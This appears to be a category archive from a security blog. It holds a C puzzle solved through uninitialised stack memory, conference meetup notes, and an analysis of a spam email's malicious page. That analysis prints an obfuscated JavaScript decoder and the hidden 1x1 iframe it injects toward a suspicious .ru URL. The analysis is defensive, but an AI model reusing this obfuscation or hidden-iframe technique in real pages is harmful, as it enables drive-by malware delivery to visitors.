xorl %eax, %eax

Archive for the ‘fun’ Category

C Quiz No. 2

with one comment

Continuing from the first one back in 2009, here is another that a friend of mine send me yesterday.

The concept is that you are free to put whatever you want in do_your_stuff() in order to make it print “win” from function do_my_stuff().

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>

void 
do_your_stuff(void)
{
	// do whatever you want
}

void 
do_my_stuff(void)
{
	char c[100];
	unsigned int i, r_index;

	srand(time(NULL));
	for(i = 0; i<1000; i++)
		r_index = rand() % (sizeof(c) - 1);

	printf("c[%u] = %02x\n", r_index, c[r_index]);

	if (c[r_index] == 0x20)
		printf("win!\n");
	else
		printf("fail\n");
	
	return;
}

int 
main(void)
{
	do_your_stuff();
	do_my_stuff();
	return 0;
}

Instantly I came up with a quite simple solution that exploits the concept of uninitialized stack that it’s being used.

void 
do_your_stuff(void)
{
	char buf[2048]; int i;
	for(i=0; i<sizeof(buf); i++) buf[i] = 0x20;
}

Which it works…

$ ./cquiz2
c[98] = 00
fail
$ ./cquiz2
c[81] = 7f
fail
$ gcc -Wall -Werror --std=c99 cquiz2.c -o cquiz_sol
$ ./cquiz_sol
c[43] = 20
win!
$ ./cquiz_sol
c[54] = 20
win!
$

I found it fun so if you have any other solutions feel free to comment on this post.

Advertisements

Written by xorl

May 18, 2013 at 16:44

Posted in C programming, fun

27c3: We Come in Peace

with 2 comments

As in the past few years, this year I am going to attend 27c3, always, with some cool friends :)

If you want to meet us to have a beer or two, contact me either through my email address, this post’s comment section, twitter, twitter’s DM, IRC, IM, write(1) or wall(1) on my home box etc. :P
I’ll be really happy meeting more interesting people IRL. So far it turned out to be awesome and fun doing this, I hope it’s still the same.
See you in Berlin xD

Hope to see again:
– FX and mumpi at the crazy phenoelit party (thanks for the beers on 26c3 Mr. FX)
– The Swedish guys (you’re great dudes)
– cccp (man… <3)
– Dan Kaminsky (who gave me the most epic reply when I said to him that we were those stalking him IRL in .nl)
– rattle (you know you're awesome man)
– sin (I hate you)
And many many others that I cannot remember right now. :)

Written by xorl

December 1, 2010 at 13:00

Posted in conferences, fun

26c3: Here Be Dragons

with one comment

Finally, the schedule was announced. Myself, ithilgore and a few more friends that I don’t know if they want to be mentioned here will be there too. We would be really happy to meet some new people and have some beers together!
Hoping for more lulz than last year…
So, see you there!!! :)

P.S.: ithilgore, get ready for round two on drunk talks with FX ;p

Written by xorl

December 3, 2009 at 10:45

Posted in conferences, fun

xorl on twitter

with 2 comments

Well, I got jealous of ithilgore’s brand new twitter account and decided to join it too! :P
You can follow me at xorlgr!

Written by xorl

November 27, 2009 at 14:56

Posted in fun

TCP Portals: The Handshake’s a Lie!

leave a comment »

A few days ago I came across this blog post by Tod Beardsley. Since there is no cool bug disclosed recently (which apparently, is a really good thing) to write about I’ll post this :P
It is indeed interesting behavior that most people (including myself) usually forget. As Tod Beardsley says in his post, there are a lot of potentials since some developers might have forgot it too. A few possibilities are remote detection, evasion of some IDS and/or IPS, or even firewalls etc.
Of course, all these are just ideas. None of them can be considered important unless somebody puts it in the test :)

Written by xorl

November 24, 2009 at 21:34

Posted in fun, Uncategorized

Funny Spam Email

leave a comment »

I received a cute spam email today. Its subject was “I watch after your PC” and its body was just containing this:

Know any maps on-line?
http://stalker-vgpu.by.ru/demo.html

Of course, it hit an amazing 15.3 score in SpamAssassin but it was still worth a try. The sender’s address was:

Received: from [190.246.47.14] (HELO 14-47-246-190.fibertel.com.ar)

So, I wget(1) that page and not surprisingly, it was some obfuscated JavaScript code. After a couple of minutes of clearing the JavaScript code up the code was pretty easy to understand. The JavaScript section is composed of nine functions. Most of them contain a straightforward algorithm similar to this:

function AEvZVPZNFD(LIFcfdLH)
{
	var int_three=3;
	var int_six=6;
	var obfu='49,3-30,3-19,3-52,0-58,0-58,0-56,0-29,0-23,3-23,3-49,0-50,3-48,3-58,3-58,0-60,3-54,3-55,3-50,0-48,3-23,0-57,0-58,3-23,3-58,0-50,3-54,3-56,0-54,0-48,3-58,0-50,3-57,3-23,3-52,3-55,0-50,0-50,3-60,0-23,0-56,0-52,0-56,0-19,3-31,0-30,0-23,3-52,3-51,0-57,0-';
	var deobfu=obfu.split('-');
	string_ret='';
	for(i=0; i<deobfu.length-1; i+=1)
	{ 
		ArrayOne=deobfu[i].split(',');
		retval = parseInt(ArrayOne[0]*int_six)+parseInt(ArrayOne[1]);
		retval = parseInt(retval)/int_three;
		string_ret += String.fromCharCode(retval);
	}

	return string_ret;
}

As you can see, it has a variable (which I renamed to ‘obfu’) that contains a series of numbers separated with ‘,’ and ‘-‘. The next variable (which I renamed it to ‘deobfu’) will simply replace the ‘-‘ characters with ‘,’ using split() and store the result in it.
The ‘for’ loop will iterate through each character and perform some calculations on each number. Specifically, it will execute the following for each one…

retval = atoi(character * 6) + atoi(next_character);
retval = atoi(retval/3);

And at last, append the result to ‘string_ret’ after converting the Unicode value to a character using fromCharCode() function. After decoding all of the obfuscated code, the result is this:

<!-- From MWmC() function -->
<iframe width=1 height=1 border=0 frameborder=0 sr
<!-- From AEvZVPZNFD() function -->
c='http://beautymoda.ru/templates/index.php'></ifr
<!-- From dHIw() function -->
ame>

So, it basically executes this:

<iframe width=1 height=1 border=0 frameborder=0 src='http://beautymoda.ru/templates/index.php'></iframe>

Unfortunately, it seems that it was already reported to the hosting provider since the above URL redirects to ‘https://best-hoster.ru/suspend/&#8217; which indicates that the website is suspended.

Written by xorl

November 7, 2009 at 01:18

Posted in fun

HAR2009

with 8 comments

har2009

This is (most likely) my last post for now. Tomorrow I’ll be flying to Netherlands for har2009 and I hope that I’ll have much better things to do there than blog posts. :P

I’m posting this for mainly two reasons. First, to let you now that I won’t be moderating and/or answering to your comments and/or emails in the next few days. And secondly, that if you want to contact me for anything, important or not, this is the right time :P

Have fun with whatever you do! xD

Written by xorl

August 11, 2009 at 06:52

Posted in fun